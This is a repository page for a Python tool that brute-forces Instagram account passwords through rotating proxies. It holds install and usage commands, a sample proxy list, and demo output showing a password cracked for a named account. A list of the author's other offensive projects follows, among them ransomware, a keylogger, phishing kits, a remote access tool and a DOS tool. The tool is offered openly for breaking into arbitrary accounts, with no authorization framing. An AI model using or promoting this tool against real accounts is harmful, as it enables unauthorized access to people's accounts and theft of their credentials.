• Stars
    star
    4,092
  • Rank 10,551 (Top 0.3 %)
  • Language
    Python
  • License
    MIT License
  • Created over 7 years ago
  • Updated 3 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Bruteforce attack for Instagram. Now available as a web app at https://yosemite-app.com

Instagram Bruter

Version Python Discord Donate

This program will brute force any Instagram account you send it its way given a list of proxies.

NOTICE

I'm no longer maintaining this project.

Support

It motivates me to keep updating this program.

Bitcoin Wallet: 3Kr5C9t9HWwPfqzSNXeBNyRvJWw9sSLeKy
PayPal: https://www.paypal.me/Msheikh03

Requirements

  • Python v3.9
  • proxy list

Install Dependencies

Install Pipenv

pip install pipenv

Create environment

Make sure you have Python 3.9 installed

pipenv --python 3.9

Install Requirements

pipenv install

Help

usage: instagram.py [-h] [-u USERNAME] [-p PASSLIST] [-px PROXYLIST] [--prune PRUNE] [--stats] [-nc] [-m MODE]

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        email or username
  -p PASSLIST, --passlist PASSLIST
                        password list
  -px PROXYLIST, --proxylist PROXYLIST
                        proxy list
  --prune PRUNE         prune the database
  --stats               get statistics of the proxies
  -nc, --no-color       disable colors
  -m MODE, --mode MODE  modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots

Proxies

The system needs a list of proxies to work. Once uploaded, proxies are saved into a database.

Upload

Upload a list of proxies into the program. The proxy file must have a format of ip:port

proxies_list.txt

3.238.111.248:80
206.189.59.192:8118
165.22.81.30:34100
176.248.120.70:3128
191.242.178.209:3128
180.92.194.235:80

To upload a list of proxies a similar syntax must be followed.

python instagram.py -px <path to proxy list>

Stats

This gives an insight into the health of the proxies in the database.

python instagram.py --stats

Prune

This allows the able to get rid of proxies with a score below a given score.
It is recommended that you run the --stats and prune the database of proxies
who have a proxy score below Q1.

python instagram.py --prune 0.05

Pruning is not a requirement because the
the system will automatically learn which proxies perform poorly and stop using them.

Usage

python instagram.py -u <username> -p <passlist>

Run

[-] Wordlist: passlist.txt
[-] Username: Sami09.1
[-] Password: 272
[-] Complete: 45.51%
[-] Attempts: 228
[-] Browsers: 273
[-] Exists: True

Stop

[-] Wordlist: passlist.txt
[-] Username: Sami09.1
[-] Password: Sami123
[-] Complete: 62.67%
[-] Attempts: 314
[-] Browsers: 185
[-] Exists: True

[!] Password Found
[+] Username: Sami09.1
[+] Password: Sami123

More Repositories

1

Loki

Remote Access Tool
Python
571
star
2

YouTubeViews-

YouTube view bot
Python
483
star
3

Pulse-

Brute Force For Facebook,Instagram & Twitter
Python
460
star
4

hyprPulse-

Brute force multiple accounts at once
Python
216
star
5

SQL-scanner

A tool that finds and scan sites for sql injection vulnerability
Python
145
star
6

Passwords

Get or generate a password list
Python
123
star
7

ApeX

Using Social Engineering To Obtain WiFi Passwords
CSS
97
star
8

Spectre

A simple phishing tool that can phish almost any website
Python
72
star
9

Aircrack

Automatic Wifi Cracker. Uses Airodump, Aircrack, Aireplay
Python
65
star
10

Thor

A Simple Ransomware
Python
46
star
11

Proxies

A Simple Proxy Scraper
Python
35
star
12

FleX

A Simple C&C Server Written In Python
Python
34
star
13

Apex-2.0

Evil twin tool.
Python
34
star
14

Notebook

An encrypted notebook
Python
33
star
15

Inflator

Inflate YouTube Views
Python
30
star
16

LearnPython

Intro to Python programming
Python
26
star
17

AnyPhish

A simple site cloner
Python
23
star
18

Micro

A URL shortener
Python
18
star
19

KLogger

A Simple Keylogger
Python
18
star
20

ExampleBotnet

This is not a real botnet, this is suppose to show how botnets work, no virus, just simple python code.
Python
16
star
21

Cyclops

A simple DOS attack tool
Go
15
star
22

AutoScan

Automatically Scans For Default Networks & Guess The Password
Python
15
star
23

Deauth

Disconnects client from router
Python
14
star
24

FacebookPhish

a phishing page
HTML
13
star
25

Discord

Discord Scripts
Python
12
star
26

GoProxies

A simple Golang program to collect proxies
Go
12
star
27

sFTP

Secure FTP
Python
10
star
28

GU3SS

Guesses Possible Default Password
Python
7
star
29

BadCrypto

BadCrypto is a crypto software that should not be used with sensitive data. (Tell me how long it took you to break it)
JavaScript
7
star
30

Serenity

An app that lets you send an email without actually sending it
HTML
6
star
31

Atomic

A proxy framework
Python
6
star
32

F.Society

Shell
6
star
33

SmartCar

Object Avoidance Vehicle (OAV)
C++
5
star
34

Crypto

A wrapper for pycryptodome
Python
5
star
35

text-editor

A rich text editor(WYSIWYG)
HTML
5
star
36

GitHub-analysis

A website for looking analyzing a GitHub account. https://github-analysis.herokuapp.com/
JavaScript
5
star
37

LoanApp

A Simple Django Project
Python
4
star
38

Cambrian

Classifying cats from dogs using machine learning
JavaScript
4
star
39

Enigma

Encryption
Python
4
star
40

Weather

A simple weather App
Dart
4
star
41

Console

A simple console app
Python
3
star
42

F-Cipher

Shell
3
star
43

Tic-Tac-Toe

Tic-Tac-Toe Game Player Vs Player & Computer Vs Player
Python
3
star
44

Miscellaneous

Random Things
C#
3
star
45

Subtl-

A simple dating app written in Django; https://subtl-app.herokuapp.com/
2
star
46

Broken-Code

Python
2
star
47

Medlyft

One of my final projects from class
TSQL
2
star
48

Txt2Gender

A program that uses texts to identify your sex.
2
star
49

24-Game-Solver

A 24 Card Game Solver
Python
1
star
50

store

A fun game written by me and my students
Python
1
star